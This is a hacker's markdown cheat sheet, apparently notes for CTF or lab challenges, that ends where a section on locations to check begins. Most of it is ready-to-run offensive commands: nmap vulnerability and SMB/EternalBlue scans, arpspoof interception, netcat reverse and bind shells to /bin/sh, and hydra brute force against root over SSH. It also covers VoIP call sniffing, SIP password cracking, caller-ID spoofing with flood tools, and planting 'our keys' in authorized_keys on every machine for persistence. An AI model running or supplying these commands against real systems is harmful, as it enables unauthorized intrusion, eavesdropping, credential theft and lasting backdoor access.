# H0w t0 h4ck 3v3ryth1ng ## Reconnaissance 0. If you want, you can use `threader3000` to scan for open ports and use these open ports for your nmap command. 2. You could first nmap the machine to see general stuff - `nmap <ip>` is sufficient for general things - `nmap -Tn <ip>` makes it possible to set performance - `-T0` or `-T1` is paranoid / sneaky to bypass IDS - `-T2` is polite -> Slow scan but not that bandwidth intense - `-T3` is normal - `-T4` is aggressive -> Fast - `-T5` is insane -> Super duper fast and intensive :) - `-p-` for full port scan - `-sn` no ping scan, only host scan - `-Pn` skip host scan - `-sV [--version-intensity 0-9]` for service scan with intensity for better correctness - `-A` **Simply use this**, because it does version detection and traceroute 2. If you see some open ports, you can run a vulnerability scan: - `nmap <ip> --script vuln` 3. There are a couple of other options to run good scripts, so replace vuln e.g. with: - `version` makes more detailed version scan - `exploit` searches actively for exploits - `discovery` search for html-titles, smb-enum-shares and SNMP devices - `broadcast` discover the local network via broadcasting #### Predefined nmap commands SMB-Vuln Check: `nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 <ip>` SMB-Enumeration: `nmap –script smb-check-enum-shares.nse –script-args=unsafe=1 -p445 <ip>` SMB-OS-Discovery: `nmap –script smb-os-discovery.nse –script-args=unsafe=1 -p445 <ip>` Eternal-Blue: `nmap -p 445 -script=smb-vuln-ms17-010.nse <ip>` ## Use gained information ### Initial contact Try to connect to the hosts (http(s), ssh, open ports) with the dedicated software (browser, ssh-agent) or with netcat. The information gained can include version numbers (from banners) or flags. ### Googling After knowing some ports or even the service behind it with version, we search for exploits. 1. Use `searchsploit <searchterm>` 2. `msfconsole` and use `search smb` e.g for smb 3. Google it Most of the time googling will lead to a solution for that version if its vulnerable and e.g. `exploit-db.com` generally has exploits or Metasploit scripts for it you can simply use in `msfconsole`. ## Snippets ### arpspoof - two way for one connection (get all the data on this route): `arpspoof -i <interface> -t <target1> -r <target2>` - one way for one host (get all data sent by anyone to this host): `arpspoof -i <interface> <target>` ### netcat IPv4 Reverse Shell - on machine: `nc <local-ip> 4444 -e /bin/sh` - local: `nc -nlvp 4444` Bind Shell: - On machine: `nc -lvp 4444 -e /bin/sh` - local: `nc <machine ip> 4444` Web Enum with gobuster: - `gobuster -u <target-host> -w /usr/share/wordlists/dirbuster/wordlist` SSH Bruteforce for root - `hydra -l root -P /usr/share/wordlists/rockyou.txt <ip> -t 4 ssh` Quick Python HTTP-Server on local machine serving files from current directory: - `python3 -m http.server <port>` ## WiFi Evil Twin Attack on WPA2: - see https://github.com/FluxionNetwork/fluxion - first [Handshake Snooper](https://github.com/FluxionNetwork/fluxion/wiki/Handshake-Snooper-Attack) and then [Captive Portal](https://github.com/FluxionNetwork/fluxion/wiki/Captive-Portal-Attack) ## Wireshark & TShark Run both Wireshark and TShark in sudo to see more or even be able to see your interfaces. ### Wirehshark Change Time and Name Resolution in View in you need it. View is in generel very helpful. Usefull filter Options: - Prtocol e.g. udp, http, etc. - ip.src == 192.168.0.0 - ip.addr == 192.168.0.0 - ip.dst == ... - && is logical AND - || is logical OR - !() is logical NOT - eth.addr == 00:00:.... - ipv6.addr == ... - ip - IPv4 only - ipv6 - udp.port == 53 - tcp.port == ... - tcp.flags.reset == 1 (for reset flag) - !(arp or icmp or dns) to keep useless stuff out - Right click on packages and use the follow option or apply filters! You apply the part as a filter where your mouse is. ### TShark Important flags: - `-c` package count - `-i` interface - `-w` write in file - `-r` read from file - `-f` for (capture-)filters, e.g.: - "host 192.168.0.1" - "net 192.../24" - "src net ..." - "port 53" - "host www.hpi.de" - "tcp portrange ..." - "ip" - `-Y` for display-filters, e.g.: - "sip or rtp" - "ip.addr == 192.168.0.1" There are many other options but thsark is basically wireshark in the command line. ## Simple website login brute force login A simple brute force for websites can be done by using hydra. Here is a simple [guide](https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/). ## Zed Attack Proxy (ZAP) This is a webapp vulnerability scanner that can also be used as a proxy between the browser and the server to manipulate the requests or analyse the them. It also has a feature for automatically scanning a webserver and crawling all its contents. It also has the typical dirbuster functionallity. ## Interesting Cheatsheets - [SQL Injection](https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_SQLInjection.txt) - [Shells](https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_Shells.txt) ## Voice over IP This is a general purpose, really useful guide on [voip-hacking](https://hakin9.org/voip-hacking-techniques/). ### Tools - sipvicious (svmap, svwar, svcrack) - sipcrack (sipdump, sipcrack) - inviteflood (for DoS and spoofed caller ID) - metasploit (search for 'voip', 'sip', or 'rtp' for tools) - has some exploits for asterisk too - Softphones (VoIP-Clients): linphone (gui), twinkle (gui, cli), pjsau / pjsip (cli) - playing audio over a voip-client is possible (easier with cli-tools). I have not tested it yet ### Sniffing I recommend to use wireshark (not tshark this time) to record any voip-calls. To sniff a connection: - open wireshark, no capture filter, display-filter: `sip or rtp` or `udp` - It becomes easier when the initial SIP-connection is sniffed too. So start wireshark before the data is transmitted - Otherwise, decode one package as rtp and hope that wireshark realizes that there is a complete call - go to RTP-Stream > Analyse Stream > Export as an `.au`-file - open the file in audacity (wireshark will crash if you play it there) ### Walking through VoIP Challenges - find VoIP-devices: `svmap [-p5060,5061,8000-8100] [-m <method>] <ip-range>` - arpspoof yourself between two communication partner - alternatively, spoof yourself as the VoIP-server --> you get all information about the connections but no actual data ### Cracking passwords Utilising the server - scan the server for extensions (IDs, alphanumerical) --> they are the numbers you can call: `svwar [-e100-2000] [-d dictionary.txt] <ip-addr>` - try to bruteforce the authentications: `svcrack -u <username> [-d <dictionary> | -r100-200,1000-2000] <server-ip>` Utilising some clients - sniff their connection (for some authentication packets): `sipdump [-i <interface>] [-f <pcap-filter>] <dump-file>` - crack the used hash: `sipcrack [-s | -w <wordlist>] <dump-file>` (`-s` takes passwords over stdin) ### Caller-ID Spoofing - `inviteflood <interface> <receiver-user> <domain (server-ip)> <receiver-ip> <num. of sent packets> -a "<fake-sender-name>"` - send very few packages when spoofing a caller-id. Otherwise, it becomes a DoS ## Add Our SSH Keys to All Machines - does `~/.ssh/` exist? - does it have 0600 permissions? - does `~/.ssh/authorized_keys` exist? - does it have 0700 permissions? - is key authentication enabled in `/etc/sshd/ssh_config`? - `echo '<our keys>' >> ~/.ssh/authorized_keys` ## Important Locations to Check for On a New Machine